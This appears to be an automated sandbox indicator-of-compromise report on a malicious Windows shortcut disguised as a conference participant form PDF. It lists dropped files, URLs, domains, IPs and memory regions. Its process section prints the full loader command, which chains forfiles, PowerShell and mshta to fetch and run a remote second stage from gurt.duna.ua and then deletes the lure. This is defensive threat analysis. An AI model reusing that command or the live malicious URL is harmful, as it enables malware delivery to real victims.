IOC Report
T15hf0Y3mp.lnk

loading gif

Files

File Path
Type
Category
Malicious
T15hf0Y3mp.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sat May 7 04:20:19 2022, mtime=Fri Oct 4 14:00:18 2024, atime=Sat May 7 04:20:19 2022, length=41472, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xfd7f282c, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\awdr_pro[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\by_onsales[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\color[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\front[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\select_radio_check[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\site_main[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\switcher[1].css
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\awdr-dynamic-price[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\classic-themes.min[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\error[1]
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\flatsome-shop[1].css
Unicode text, UTF-8 text, with very long lines (24156)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\front[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\label[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\radio[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\styles[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\by_instock[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\chosen.min[1].css
ASCII text, with very long lines (372)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\customize-table[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gtm4wp-contact-form-7-tracker[1].js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\husky[1].js
C++ source, ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\quick_search[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\switcher[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\warning[1]
GIF image data, version 89a, 36 x 38
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\awdr_style[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\by_author[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\checkbox[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\flatsome[1].css
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\front[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jquery.min[1].js
ASCII text, with very long lines (65447)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tooltip[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mku24xam.rdi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4cjefny.qes.ps1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 30 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
. \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://gurt.duna.ua/programy-nauczania/GIEA
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
malicious
https://github.com/Pester/Pester
unknown
malicious
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
185.68.16.189
malicious
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
185.68.16.189
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/my-account/lost-password/
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=12
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.57KJd
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.css
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aR
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1DSC:
unknown
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Ar
unknown
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2a
unknown
https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8
185.68.16.189
https://gurt.duna.ua/dohovir-oferty/
unknown
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2C:
unknown
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2i
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://gurt.duna.ua/ru/optovaia-prodazha-duna/
unknown
https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1
185.68.16.189
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2w
unknown
https://gurt.duna.ua/help/
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1P
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
185.68.16.189
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2s
unknown
https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
unknown
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.5
unknown
https://nuget.org/nuget.exe
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
unknown
https://gurt.duna.ua/wp-admin/admin-ajax.php
unknown
https://gurt.duna.ua/my-account/orders/
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.57
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1F
unknown
https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
unknown
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1%
unknown
https://contoso.com/Icon
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
unknown
http://crl.ver)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
unknown
https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
unknown
https://schema.org
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7js=
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
unknown
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.12
unknown
https://gurt.duna.ua/cart/
unknown
http://gmpg.org/xfn/11
unknown
https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
unknown
https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
unknown
https://gurt.duna.ua/wp-json/
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2y
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7b
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2tx
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5?ver=2.3.73.8
unknown
https://yoast.com/wordpress/plugins/seo/
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
185.68.16.189
https://gurt.duna.ua/my-account/
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
185.68.16.189
https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
unknown
https://gurt.duna.ua/comments/feed/
unknown
https://gurt.duna.ua/order-table/
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?6
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gurt.duna.ua
185.68.16.189
malicious

IPs

IP
Domain
Country
Malicious
185.68.16.189
gurt.duna.ua
Ukraine
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
2266D17D000
heap
page read and write
22601D34000
trusted library allocation
page read and write
1840C7F7000
heap
page read and write
18407ACA000
heap
page read and write
6F5694C000
trusted library allocation
page read and write
18407B61000
heap
page read and write
1FF7031A000
heap
page read and write
77A03FE000
stack
page read and write
184078AE000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
184078B0000
heap
page read and write
184078A8000
heap
page read and write
77A19FC000
stack
page read and write
226019EC000
trusted library allocation
page read and write
2266AF14000
heap
page read and write
2266CCB0000
heap
page execute and read and write
184073F0000
trusted library allocation
page read and write
18407796000
heap
page read and write
1840C6F0000
trusted library allocation
page read and write
77A01F7000
stack
page read and write
7FFD9B942000
trusted library allocation
page read and write
1FF74E60000
trusted library allocation
page read and write
1840743C000
trusted library allocation
page read and write
1FF75053000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
18407A2A000
heap
page read and write
18407DA4000
trusted library allocation
page read and write
2266AEC6000
heap
page read and write
1FF7504C000
heap
page read and write
184078C9000
heap
page read and write
1840788D000
heap
page read and write
18407AA5000
heap
page read and write
1FF6FA8D000
heap
page read and write
18407AB9000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
18407AD0000
heap
page read and write
22601701000
trusted library allocation
page read and write
1FF70215000
heap
page read and write
17C06E04000
heap
page read and write
1FF74F42000
trusted library allocation
page read and write
A48057E000
stack
page read and write
2266B080000
heap
page read and write
7DF4324C1000
trusted library allocation
page execute read
2266C950000
trusted library allocation
page read and write
18407ACC000
heap
page read and write
184077A8000
heap
page read and write
17C055C0000
heap
page read and write
184073F3000
trusted library allocation
page read and write
1FF75220000
remote allocation
page read and write
184077AA000
heap
page read and write
1FF74E81000
trusted library allocation
page read and write
2266D138000
heap
page read and write
1FF70300000
heap
page read and write
184078C9000
heap
page read and write
6F561FD000
stack
page read and write
6F5654E000
stack
page read and write
18407CF7000
trusted library allocation
page read and write
18407433000
trusted library allocation
page read and write
18407D10000
trusted library allocation
page read and write
1FF74F71000
trusted library allocation
page read and write
1840742C000
trusted library allocation
page read and write
184078B1000
heap
page read and write
184077C7000
heap
page read and write
17C06E21000
heap
page read and write
184077C7000
heap
page read and write
1FF750B6000
heap
page read and write
1FF75084000
heap
page read and write
18407945000
trusted library allocation
page read and write
77A0CFE000
unkown
page readonly
1FF74E88000
trusted library allocation
page read and write
17C057E0000
heap
page read and write
18407788000
heap
page read and write
A4801EE000
stack
page read and write
1FF75086000
heap
page read and write
1840C7B0000
trusted library allocation
page read and write
18407B2C000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
18407418000
trusted library allocation
page read and write
18407E40000
trusted library allocation
page read and write
2266C870000
trusted library allocation
page read and write
18407889000
heap
page read and write
184078A8000
heap
page read and write
17C06F44000
heap
page read and write
18407885000
heap
page read and write
18407930000
trusted library allocation
page read and write
22601965000
trusted library allocation
page read and write
1FF74EB0000
trusted library allocation
page read and write
1840776D000
heap
page read and write
1DE6B508000
heap
page read and write
1FF6FA96000
heap
page read and write
18407710000
heap
page read and write
184077EF000
heap
page read and write
1840CBB0000
trusted library allocation
page read and write
6F55EFB000
stack
page read and write
77A1CFE000
unkown
page readonly
184079DE000
trusted library allocation
page read and write
1840CBC0000
trusted library allocation
page read and write
A4806FE000
stack
page read and write
18407590000
heap
page read and write
77A07FC000
stack
page read and write
7FFD9B770000
trusted library allocation
page read and write
6F562FE000
stack
page read and write
17C054B7000
trusted library allocation
page read and write
1840794E000
trusted library allocation
page read and write
17C05529000
heap
page read and write
1840C7BE000
heap
page read and write
184079F0000
heap
page read and write
17C054B0000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
18407959000
trusted library allocation
page read and write
2266AF40000
heap
page read and write
1FF75113000
heap
page read and write
184078B4000
heap
page read and write
17C05536000
heap
page read and write
1840C7C1000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1FF750C3000
heap
page read and write
17C054D0000
trusted library allocation
page read and write
17C05585000
heap
page read and write
184078CD000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
184078BE000
heap
page read and write
1FF74E80000
trusted library allocation
page read and write
77A0BFB000
stack
page read and write
1FF74F11000
trusted library allocation
page read and write
18407932000
trusted library allocation
page read and write
1840771F000
heap
page read and write
A4804FD000
stack
page read and write
18407E38000
trusted library allocation
page read and write
18407996000
trusted library allocation
page read and write
18407E2A000
trusted library allocation
page read and write
1FF7031A000
heap
page read and write
184073E8000
trusted library allocation
page read and write
1FF74FB0000
trusted library allocation
page read and write
1FF74F3A000
trusted library allocation
page read and write
1FF709E0000
trusted library allocation
page read and write
1FF6FA00000
heap
page read and write
77A227E000
stack
page read and write
1DE6B480000
heap
page read and write
1FF6FB13000
heap
page read and write
1840789B000
heap
page read and write
18407A89000
heap
page read and write
6F560FE000
stack
page read and write
18407CDC000
trusted library allocation
page read and write
18407ACE000
heap
page read and write
18407834000
heap
page read and write
18407710000
remote allocation
page read and write
18407B61000
heap
page read and write
18407A4A000
heap
page read and write
2266C910000
heap
page read and write
18407A70000
heap
page read and write
184078B5000
heap
page read and write
18407A7B000
heap
page read and write
184077AA000
heap
page read and write
17C06E39000
heap
page read and write
184073AE000
trusted library allocation
page read and write
184078AE000
heap
page read and write
184077BD000
heap
page read and write
184078E3000
heap
page read and write
2266CC0F000
heap
page read and write
18407BEE000
heap
page read and write
1FF7500F000
heap
page read and write
184077EF000
heap
page read and write
1FF74F65000
trusted library allocation
page read and write
184077C1000
heap
page read and write
6F55CFB000
stack
page read and write
18407BEB000
heap
page read and write
6F5684E000
stack
page read and write
1840792D000
trusted library allocation
page read and write
6F563FD000
stack
page read and write
18407766000
heap
page read and write
1FF74EA0000
trusted library allocation
page read and write
18407A7E000
heap
page read and write
1FF76000000
heap
page read and write
184077F0000
heap
page read and write
2266CCD0000
heap
page execute and read and write
18407940000
trusted library allocation
page read and write
18407366000
trusted library allocation
page read and write
184077ED000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
18407340000
heap
page read and write
184078B5000
heap
page read and write
18407AC3000
heap
page read and write
18407A6D000
heap
page read and write
1FF708B0000
trusted library section
page readonly
18407B4C000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
17C05518000
heap
page read and write
2266AE7E000
heap
page read and write
184079D0000
trusted library allocation
page read and write
2266C993000
heap
page read and write
18407A73000
heap
page read and write
184078A8000
heap
page read and write
18407B61000
heap
page read and write
17C06E36000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
18407594000
heap
page read and write
77A12FE000
unkown
page readonly
184078B6000
heap
page read and write
184078A7000
heap
page read and write
184077BD000
heap
page read and write
18407C10000
trusted library allocation
page read and write
18407E68000
trusted library allocation
page read and write
22610010000
trusted library allocation
page read and write
1840740F000
trusted library allocation
page read and write
1FF75000000
heap
page read and write
2266AF1F000
heap
page read and write
184078A8000
heap
page read and write
18407B38000
heap
page read and write
18407DF0000
heap
page read and write
A480AFE000
stack
page read and write
77A14FE000
unkown
page readonly
1FF7503F000
heap
page read and write
7FFD9B900000
trusted library allocation
page read and write
1FF6FB00000
heap
page read and write
77A13FE000
stack
page read and write
18407430000
trusted library allocation
page read and write
18407B38000
heap
page read and write
18407788000
heap
page read and write
1FF6FAB1000
heap
page read and write
77A11FE000
unkown
page readonly
18407E58000
trusted library allocation
page read and write
184078A8000
heap
page read and write
2266CBA7000
heap
page execute and read and write
18407A1F000
heap
page read and write
7DF4324A1000
trusted library allocation
page execute read
18407947000
trusted library allocation
page read and write
184078B6000
heap
page read and write
1FF750D6000
heap
page read and write
18407932000
trusted library allocation
page read and write
18407ACC000
heap
page read and write
18407A77000
heap
page read and write
18407ACA000
heap
page read and write
2266CBB0000
heap
page read and write
18407B75000
heap
page read and write
22600C32000
trusted library allocation
page read and write
1840C7A0000
trusted library allocation
page read and write
184078D8000
heap
page read and write
18407E60000
trusted library allocation
page read and write
18407A82000
heap
page read and write
6F555BE000
stack
page read and write
2266CC7B000
heap
page read and write
1840CBB3000
trusted library allocation
page read and write
77A0F7E000
stack
page read and write
184078D7000
heap
page read and write
184078ED000
heap
page read and write
1FF75220000
remote allocation
page read and write
2266AECC000
heap
page read and write
A48077E000
stack
page read and write
1FF74F87000
trusted library allocation
page read and write
2266CBB4000
heap
page read and write
18407AA5000
heap
page read and write
2266C8B0000
trusted library allocation
page read and write
6F55BFB000
stack
page read and write
18407A42000
heap
page read and write
184078C9000
heap
page read and write
1FF74EE4000
trusted library allocation
page read and write
17C057EE000
heap
page read and write
18407B75000
heap
page read and write
2266B040000
heap
page read and write
2266CCAA000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1840C7B7000
heap
page read and write
18407DB0000
trusted library allocation
page read and write
2260008A000
trusted library allocation
page read and write
2266C8A0000
heap
page readonly
944A0FF000
stack
page read and write
A4807FE000
stack
page read and write
18407390000
trusted library allocation
page read and write
1FF74E00000
trusted library allocation
page read and write
2266CBC9000
heap
page read and write
77A06FE000
unkown
page readonly
77A05FC000
stack
page read and write
18407A73000
heap
page read and write
18407B6F000
heap
page read and write
1840779C000
heap
page read and write
18407AD0000
heap
page read and write
77A187E000
unkown
page readonly
184077F3000
heap
page read and write
184079FB000
heap
page read and write
1FF74E98000
trusted library allocation
page read and write
22601861000
trusted library allocation
page read and write
17C06F4D000
heap
page read and write
77A02FE000
unkown
page readonly
1FF750F9000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
184077EB000
heap
page read and write
6F5644F000
stack
page read and write
2266C915000
heap
page read and write
17C05450000
heap
page read and write
1FF74F20000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
184073B8000
trusted library allocation
page read and write
1FF750DE000
heap
page read and write
2266CBBB000
heap
page read and write
1FF6FABE000
heap
page read and write
1FF7501F000
heap
page read and write
184077C7000
heap
page read and write
184078AE000
heap
page read and write
2266AE67000
heap
page read and write
184079A0000
trusted library allocation
page execute
7DF4324B0000
trusted library allocation
page readonly
1FF70313000
heap
page read and write
77A127E000
stack
page read and write
77A15FE000
unkown
page readonly
1FF74F60000
trusted library allocation
page read and write
17C055D9000
heap
page read and write
1FF75100000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
2266CBBF000
heap
page read and write
1FF750F3000
heap
page read and write
184078AE000
heap
page read and write
77A0DFE000
unkown
page readonly
77A1BFA000
stack
page read and write
18407925000
trusted library allocation
page read and write
18407B6F000
heap
page read and write
1FF708D0000
trusted library section
page readonly
1840C807000
heap
page read and write
18407A66000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
184078A8000
heap
page read and write
1DE6B460000
heap
page read and write
2266AF3C000
heap
page read and write
18407AB9000
heap
page read and write
1840799E000
trusted library allocation
page read and write
2266D120000
heap
page read and write
22601680000
trusted library allocation
page read and write
184078AE000
heap
page read and write
18407D30000
trusted library allocation
page read and write
184079C0000
heap
page readonly
944A17F000
stack
page read and write
1FF74E70000
trusted library allocation
page read and write
18407ACC000
heap
page read and write
17C06E1E000
heap
page read and write
17C057E5000
heap
page read and write
17C0554D000
heap
page read and write
22601632000
trusted library allocation
page read and write
184077BF000
heap
page read and write
7FFD9B762000
trusted library allocation
page read and write
1FF6FA66000
heap
page read and write
77A0D7E000
stack
page read and write
18407E30000
trusted library allocation
page read and write
184077C1000
heap
page read and write
18407B77000
heap
page read and write
2266CBA0000
heap
page execute and read and write
18407B6F000
heap
page read and write
18407D20000
trusted library allocation
page read and write
1FF6FB02000
heap
page read and write
184078AE000
heap
page read and write
1FF74F50000
trusted library allocation
page read and write
18407A73000
heap
page read and write
18407721000
heap
page read and write
22600232000
trusted library allocation
page read and write
17C05470000
heap
page read and write
2266AE9E000
heap
page read and write
2266CAF0000
heap
page read and write
1DE6B380000
heap
page read and write
6F5664C000
stack
page read and write
18407B77000
heap
page read and write
17C05510000
heap
page read and write
2266D040000
heap
page read and write
77A0EFE000
unkown
page readonly
1FF6F8A0000
heap
page read and write
2266CBB8000
heap
page read and write
18407B53000
heap
page read and write
2266CC45000
heap
page read and write
7DF4324A0000
trusted library allocation
page readonly
7FFD9B816000
trusted library allocation
page read and write
2266C890000
trusted library allocation
page read and write
18407DD8000
trusted library allocation
page read and write
2266CBBD000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1FF6F9E0000
trusted library section
page read and write
1FF6FAA7000
heap
page read and write
1840738D000
trusted library allocation
page read and write
1FF74EC0000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
18407E88000
trusted library allocation
page read and write
17C057A0000
heap
page read and write
18407A70000
heap
page read and write
1FF74F74000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1840C804000
heap
page read and write
1FF708C0000
trusted library section
page readonly
A4808F7000
stack
page read and write
184077B1000
heap
page read and write
2266B085000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
18407A42000
heap
page read and write
184077C7000
heap
page read and write
1FF6FA2F000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
184073A9000
trusted library allocation
page read and write
77A1AFE000
unkown
page readonly
1FF74F9A000
trusted library allocation
page read and write
1FF6FA3F000
heap
page read and write
7DF4324B1000
trusted library allocation
page execute read
